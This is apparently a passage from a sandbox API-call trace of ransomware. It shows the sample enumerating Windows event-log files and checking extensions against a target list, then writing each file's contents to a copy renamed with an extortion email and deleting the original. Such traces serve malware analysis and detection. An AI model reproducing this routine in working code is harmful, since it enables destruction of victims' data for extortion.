(lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW (lpString=".doc") returned 4 [0069.426] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".docx") returned 5 [0069.426] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.426] lstrlenW (lpString=".pdf") returned 4 [0069.426] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".xls") returned 4 [0069.426] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".xlsx") returned 5 [0069.426] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.426] lstrlenW (lpString=".ppt") returned 4 [0069.426] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW (lpString=".zip") returned 4 [0069.426] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".rar") returned 4 [0069.426] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".bz2") returned 4 [0069.426] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.426] lstrlenW (lpString=".7z") returned 3 [0069.426] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.426] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.426] lstrlenW (lpString=".dbf") returned 4 [0069.426] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.427] lstrlenW (lpString=".1cd") returned 4 [0069.427] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.427] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0069.427] lstrlenW (lpString=".jpg") returned 4 [0069.427] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.427] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.427] lstrlenW (lpString="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 57 [0069.427] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0069.427] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0069.427] CloseHandle (hObject=0x37c) returned 1 [0069.427] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 0x20 [0069.427] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.427] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0069.427] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.428] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.428] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0069.428] GetLastError () returned 0x0 [0069.428] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.430] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.432] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.432] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x146, lpOverlapped=0x0) returned 1 [0069.432] SetEndOfFile (hFile=0x2c0) returned 1 [0069.432] CloseHandle (hObject=0x2c0) returned 1 [0069.432] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.432] SetEndOfFile (hFile=0x37c) returned 1 [0069.433] CloseHandle (hObject=0x37c) returned 1 [0069.433] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.433] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx")) returned 1 [0069.433] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.433] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.433] lstrlenW (lpString=".doc") returned 4 [0069.433] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.433] lstrlenW (lpString=".docx") returned 5 [0069.434] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.434] lstrlenW (lpString=".pdf") returned 4 [0069.434] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".xls") returned 4 [0069.434] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".xlsx") returned 5 [0069.434] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.434] lstrlenW (lpString=".ppt") returned 4 [0069.434] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.434] lstrlenW (lpString=".zip") returned 4 [0069.434] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".rar") returned 4 [0069.434] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".bz2") returned 4 [0069.434] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".7z") returned 3 [0069.434] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.434] lstrlenW (lpString=".dbf") returned 4 [0069.434] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.434] lstrlenW (lpString=".1cd") returned 4 [0069.434] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.434] lstrlenW (lpString=".jpg") returned 4 [0069.434] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.434] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.434] lstrlenW (lpString=".doc") returned 4 [0069.434] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".docx") returned 5 [0069.434] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.434] lstrlenW (lpString=".pdf") returned 4 [0069.434] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.434] lstrlenW (lpString=".xls") returned 4 [0069.434] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString=".xlsx") returned 5 [0069.435] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.435] lstrlenW (lpString=".ppt") returned 4 [0069.435] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.435] lstrlenW (lpString=".zip") returned 4 [0069.435] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString=".rar") returned 4 [0069.435] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString=".bz2") returned 4 [0069.435] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString=".7z") returned 3 [0069.435] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.435] lstrlenW (lpString=".dbf") returned 4 [0069.435] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.435] lstrlenW (lpString=".1cd") returned 4 [0069.435] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.435] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 65 [0069.435] lstrlenW (lpString=".jpg") returned 4 [0069.435] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.435] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.435] lstrlenW (lpString="Microsoft-Windows-Winlogon%4Operational.evtx") returned 44 [0069.435] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0069.436] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0069.436] CloseHandle (hObject=0x37c) returned 1 [0069.436] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 0x20 [0069.436] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.436] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0069.436] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.436] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.436] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0069.437] GetLastError () returned 0x0 [0069.437] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.439] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.440] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.440] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x12c, lpOverlapped=0x0) returned 1 [0069.441] SetEndOfFile (hFile=0x2c0) returned 1 [0069.441] CloseHandle (hObject=0x2c0) returned 1 [0069.441] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.441] SetEndOfFile (hFile=0x37c) returned 1 [0069.442] CloseHandle (hObject=0x37c) returned 1 [0069.442] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.442] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 1 [0069.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.442] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.442] lstrlenW (lpString=".doc") returned 4 [0069.442] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.442] lstrlenW (lpString=".docx") returned 5 [0069.442] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.442] lstrlenW (lpString=".pdf") returned 4 [0069.442] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.442] lstrlenW (lpString=".xls") returned 4 [0069.442] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.442] lstrlenW (lpString=".xlsx") returned 5 [0069.442] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.442] lstrlenW (lpString=".ppt") returned 4 [0069.443] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString=".zip") returned 4 [0069.443] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString=".rar") returned 4 [0069.443] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString=".bz2") returned 4 [0069.443] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString=".7z") returned 3 [0069.443] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString=".dbf") returned 4 [0069.443] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString=".1cd") returned 4 [0069.443] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString=".jpg") returned 4 [0069.443] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString=".doc") returned 4 [0069.443] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString=".docx") returned 5 [0069.443] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.443] lstrlenW (lpString=".pdf") returned 4 [0069.443] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString=".xls") returned 4 [0069.443] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString=".xlsx") returned 5 [0069.443] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.443] lstrlenW (lpString=".ppt") returned 4 [0069.443] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.443] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.443] lstrlenW (lpString=".zip") returned 4 [0069.443] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.444] lstrlenW (lpString=".rar") returned 4 [0069.444] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.444] lstrlenW (lpString=".bz2") returned 4 [0069.444] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.444] lstrlenW (lpString=".7z") returned 3 [0069.444] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.444] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.444] lstrlenW (lpString=".dbf") returned 4 [0069.444] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.444] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.444] lstrlenW (lpString=".1cd") returned 4 [0069.444] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.444] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0069.444] lstrlenW (lpString=".jpg") returned 4 [0069.444] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.444] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.444] lstrlenW (lpString="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 48 [0069.444] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0069.444] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=1052672) returned 1 [0069.444] CloseHandle (hObject=0x37c) returned 1 [0069.444] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 0x20 [0069.444] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.445] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0069.445] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.445] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.445] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0069.445] GetLastError () returned 0x0 [0069.445] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0070.083] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0070.097] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x1010, lpOverlapped=0x0) returned 1 [0070.104] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x1020, lpOverlapped=0x0) returned 1 [0070.658] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.659] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x134, lpOverlapped=0x0) returned 1 [0070.659] SetEndOfFile (hFile=0x2c0) returned 1 [0070.659] CloseHandle (hObject=0x2c0) returned 1 [0070.659] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.659] SetEndOfFile (hFile=0x37c) returned 1 [0070.660] CloseHandle (hObject=0x37c) returned 1 [0070.660] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0070.660] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 1 [0070.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.660] lstrlenW (lpString=".doc") returned 4 [0070.660] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0070.660] lstrlenW (lpString=".docx") returned 5 [0070.661] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0070.661] lstrlenW (lpString=".pdf") returned 4 [0070.661] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString=".xls") returned 4 [0070.661] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString=".xlsx") returned 5 [0070.661] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0070.661] lstrlenW (lpString=".ppt") returned 4 [0070.661] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.661] lstrlenW (lpString=".zip") returned 4 [0070.661] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString=".rar") returned 4 [0070.661] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString=".bz2") returned 4 [0070.661] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString=".7z") returned 3 [0070.661] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0070.661] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.661] lstrlenW (lpString=".dbf") returned 4 [0070.661] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.661] lstrlenW (lpString=".1cd") returned 4 [0070.661] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0070.661] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.661] lstrlenW (lpString=".jpg") returned 4 [0070.661] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.662] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.662] lstrlenW (lpString=".doc") returned 4 [0070.662] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString=".docx") returned 5 [0070.662] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0070.662] lstrlenW (lpString=".pdf") returned 4 [0070.662] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString=".xls") returned 4 [0070.662] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString=".xlsx") returned 5 [0070.662] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0070.662] lstrlenW (lpString=".ppt") returned 4 [0070.662] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0070.662] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0070.662] lstrlenW (lpString=".zip") returned 4 [0070.662] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 